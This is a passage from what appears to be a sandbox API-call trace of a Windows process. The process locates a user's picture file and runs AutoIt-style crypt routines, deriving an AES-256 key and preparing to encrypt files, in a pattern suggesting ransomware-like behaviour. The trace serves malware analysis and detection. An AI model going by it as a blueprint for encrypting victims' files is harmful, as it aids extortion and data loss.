(Locale=0x400, dwCmpFlags=0x1, lpString1="3ToL.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.464] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.464] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.464] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.464] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.465] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.465] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.465] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.465] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd2a7c0, ftCreationTime.dwHighDateTime=0x1d5c30e, ftLastAccessTime.dwLowDateTime=0xae940c60, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0xae940c60, ftLastWriteTime.dwHighDateTime=0x1d5b820, nFileSizeHigh=0x0, nFileSizeLow=0x10ae9, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="HFkYcn4W3ToL.png", cAlternateFileName="HFKYCN~1.PNG")) returned 0x7c2100 [0039.465] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.465] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.465] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.465] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.466] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.466] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.466] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.466] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0039.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.467] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.467] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.467] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.467] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.467] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.467] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.468] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.468] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.468] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.468] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.468] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.468] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.468] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.468] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.468] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.469] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.469] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.469] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.469] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.469] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.469] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.469] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.470] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.470] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 